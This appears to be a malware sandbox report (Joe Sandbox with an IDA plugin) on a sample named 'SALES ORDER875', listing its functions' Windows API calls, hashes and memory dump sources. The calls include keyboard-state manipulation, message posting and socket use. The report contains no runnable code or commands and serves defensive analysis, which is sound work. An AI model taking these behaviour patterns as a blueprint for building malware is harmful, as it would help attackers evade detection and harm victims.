                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                    • Opcode ID: bff2abbb42ab7fb5a59d4dd82594ec6a9609cd01bb946d0dcf77868c4962af33
                                                                                                                                                                                    • Instruction ID: 04a18b308900a9396952667fb1dd3260dc1a042c8631c2778c8ee6ac0e98c202
                                                                                                                                                                                    • Opcode Fuzzy Hash: bff2abbb42ab7fb5a59d4dd82594ec6a9609cd01bb946d0dcf77868c4962af33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19D17A75A0060AAFDF10DFA8C881BAFB7B5FF48344F14807AE915AB281E7749945CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 003C15CE
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003C1651
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003C16E4
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003C16FB
                                                                                                                                                                                      • Part of subcall function 003B3820: RtlAllocateHeap.NTDLL(00000000,?,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6,?,00381129), ref: 003B3852
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003C1777
                                                                                                                                                                                    • __freea.LIBCMT ref: 003C17A2
                                                                                                                                                                                    • __freea.LIBCMT ref: 003C17AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                    • Opcode ID: b745cb53b8a0ee272f5d43c6124bf8da50aec0588d316c3cc87ea506c1ba70e2
                                                                                                                                                                                    • Instruction ID: 0ed2ada63d86d91efaa6299e7dee1e742aa938405fb69bc1e9e35384e74a3410
                                                                                                                                                                                    • Opcode Fuzzy Hash: b745cb53b8a0ee272f5d43c6124bf8da50aec0588d316c3cc87ea506c1ba70e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED91B372E102169ADF228E64CC91FEE7BB99F4B310F19466DE901E7142DB35DC44EBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                    • Opcode ID: a7226dca1a25a9acf8339e89c5ab60b776a38ca346e3df723e0291159477616d
                                                                                                                                                                                    • Instruction ID: 747264a065cc840f194abdeaec1cdede5c4130873a7f25164c95cf4bc506afb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: a7226dca1a25a9acf8339e89c5ab60b776a38ca346e3df723e0291159477616d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 859181B1A00215ABDF20CFA4C844FAF77B8EF86714F10856AF615AB281D7789941CFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003F125C
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003F1284
                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003F12A8
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003F12D8
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003F135F
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003F13C4
                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003F1430
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                    • Opcode ID: 1dfe8ac010ab753f3662d54d4b161f23330d41348ff64d87c4e470402c295b1d
                                                                                                                                                                                    • Instruction ID: 452107e8de2c428879e421b980fd028f342e1c2e10e6ec49ace92a0dc4a43156
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dfe8ac010ab753f3662d54d4b161f23330d41348ff64d87c4e470402c295b1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99910575A0020DEFDB06DF99E885BBEB7B9FF44314F114429EA10EB291D774A941CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                    • Opcode ID: c318dc077b16c0afe949c6b05377de4964bcfa2b3988931fea871a929a36f75e
                                                                                                                                                                                    • Instruction ID: ad4931b41ee4d492b5356b49f31bb56f50280bd13ae7232e1b50d47244fe6f3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c318dc077b16c0afe949c6b05377de4964bcfa2b3988931fea871a929a36f75e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB911571940219EFCF12CFA9CC84AEEBBB8FF49320F15855AE515B7251D374AA41CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040396B
                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00403A7A
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00403A8A
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403C1F
                                                                                                                                                                                      • Part of subcall function 003F0CDF: VariantInit.OLEAUT32(00000000), ref: 003F0D1F
                                                                                                                                                                                      • Part of subcall function 003F0CDF: VariantCopy.OLEAUT32(?,?), ref: 003F0D28
                                                                                                                                                                                      • Part of subcall function 003F0CDF: VariantClear.OLEAUT32(?), ref: 003F0D34
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                    • Opcode ID: 7574d2245cbee6382828bb0f38c2e7a4111262eb35f022d805ac2a07d3c2d3b7
                                                                                                                                                                                    • Instruction ID: 6ebb9943e6a142016d9221ad6b80b17eb01c0e6c31f3b597dc0684bb707f038e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7574d2245cbee6382828bb0f38c2e7a4111262eb35f022d805ac2a07d3c2d3b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5916D756083059FC704EF24C48096ABBE9FF89315F14896EF489AB391DB34EE05CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?,?,003E035E), ref: 003E002B
                                                                                                                                                                                      • Part of subcall function 003E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?), ref: 003E0046
                                                                                                                                                                                      • Part of subcall function 003E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?,?), ref: 003E0054
                                                                                                                                                                                      • Part of subcall function 003E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003DFF41,80070057,?), ref: 003E0064
                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00404C51
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00404D59
                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00404DCF
                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00404DDA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                    • Opcode ID: 9625b4db8853da9f0c663e3bd03be1d115d3cd82cf78a0da7176a068abff341a
                                                                                                                                                                                    • Instruction ID: e4efc9ba928ac3b2a95e63dcbf2da4fb84bc3683940db4893121f5bfb76a20c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9625b4db8853da9f0c663e3bd03be1d115d3cd82cf78a0da7176a068abff341a
                                                                                                                                                                                    • Instruction Fuzzy Hash: B09129B1D0021D9FDF15EFA4C891AEEB7B8BF48300F10816AE515BB291DB349A45CFA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00412183
                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 004121B5
                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004121DD
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00412213
                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 0041224D
                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 0041225B
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3A57
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetCurrentThreadId.KERNEL32 ref: 003E3A5E
                                                                                                                                                                                      • Part of subcall function 003E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E25B3), ref: 003E3A65
                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004122E3
                                                                                                                                                                                      • Part of subcall function 003EE97B: Sleep.KERNEL32 ref: 003EE9F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                    • Opcode ID: db6496187fa8dc4fc8ce4a431e9e381f7b70a27e716a9a426d61c1ba6803885f
                                                                                                                                                                                    • Instruction ID: 9887852a845d5674dc3cd626a5a02d708a0fe752174036f9e7ae606c107927e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: db6496187fa8dc4fc8ce4a431e9e381f7b70a27e716a9a426d61c1ba6803885f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F719F35A00215AFCB11EF64C985AEEB7F1EF48310F1484AAE916EB341D778ED918B94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 003EAEF9
                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 003EAF0E
                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 003EAF6F
                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 003EAF9D
                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 003EAFBC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 003EAFFD
                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003EB020
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                    • Opcode ID: f279aa35ecf11ad2c7095e67fa0fac24040b889200301a701f8a6569c09057e7
                                                                                                                                                                                    • Instruction ID: 7a25cb85993108a71dd6b92589b676cb08d63e4fb81d822f03818a99b70ee992
                                                                                                                                                                                    • Opcode Fuzzy Hash: f279aa35ecf11ad2c7095e67fa0fac24040b889200301a701f8a6569c09057e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: D751B1A0604BE53DFB3783368C45BBBBEE95B06304F098689E1D9598D2C398BCC9D751
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 003EAD19
                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 003EAD2E
                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 003EAD8F
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003EADBB
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003EADD8
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003EAE17
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003EAE38
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                    • Opcode ID: 099f1888cb136be3f3f79c018817a74ce5f07396c5c034d813c28980108f9bc4
                                                                                                                                                                                    • Instruction ID: d4ad79cda55efcc963aaf60d7ea29c3d4e22205a9228171ff0e44fd0263e3eaa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 099f1888cb136be3f3f79c018817a74ce5f07396c5c034d813c28980108f9bc4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C351F7A1504BF53DFB3383368C95BBBBE995F45300F098688E1D54A8C2C294FC88E752
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32(003C3CD6,?,?,?,?,?,?,?,?,003B5BA3,?,?,003C3CD6,?,?), ref: 003B5470
                                                                                                                                                                                    • __fassign.LIBCMT ref: 003B54EB
                                                                                                                                                                                    • __fassign.LIBCMT ref: 003B5506
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,003C3CD6,00000005,00000000,00000000), ref: 003B552C
                                                                                                                                                                                    • WriteFile.KERNEL32(?,003C3CD6,00000000,003B5BA3,00000000,?,?,?,?,?,?,?,?,?,003B5BA3,?), ref: 003B554B
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,003B5BA3,00000000,?,?,?,?,?,?,?,?,?,003B5BA3,?), ref: 003B5584
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: 381bf6a8f433fbc7086b2066ad64f445a6e3b4182892bc58f24496643c31248f
                                                                                                                                                                                    • Instruction ID: 6c9aae91ef936c15296b28f7334cea2a37206742b01d14284725fbae6bc5a8ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 381bf6a8f433fbc7086b2066ad64f445a6e3b4182892bc58f24496643c31248f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5151C571A006489FDB21CFA8D881BEEBBF9EF09305F14411AE656E7291D730DA41CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040304E: inet_addr.WSOCK32(?), ref: 0040307A
                                                                                                                                                                                      • Part of subcall function 0040304E: _wcslen.LIBCMT ref: 0040309B
                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00401112
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00401121
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 004011C9
                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 004011F9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2675159561-0
                                                                                                                                                                                    • Opcode ID: 391f965bb4271c3722b30ccbc3f07d329891c5a52df9d6225163ddd9dca71590
                                                                                                                                                                                    • Instruction ID: 88ab81a2267e978666b6a12ef1114b6d17944254cc1ff63ff521af18a1ab62bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 391f965bb4271c3722b30ccbc3f07d329891c5a52df9d6225163ddd9dca71590
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41C631600204AFDB14AF14CC84BAABBE9EF49314F14806AF915AF2D1C774ED41CBE5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ECF22,?), ref: 003EDDFD
                                                                                                                                                                                      • Part of subcall function 003EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ECF22,?), ref: 003EDE16
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003ECF45
                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003ECF7F
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003ED005
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003ED01B
                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 003ED061
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                    • Opcode ID: b9bcfb9ad08ed037d782ae787411294510186b99b1419cb864bccbf2a20eb298
                                                                                                                                                                                    • Instruction ID: b35b16d0d539a2080ffe0157536445d0c8c85a3862eea6d216a4f3a58b75c759
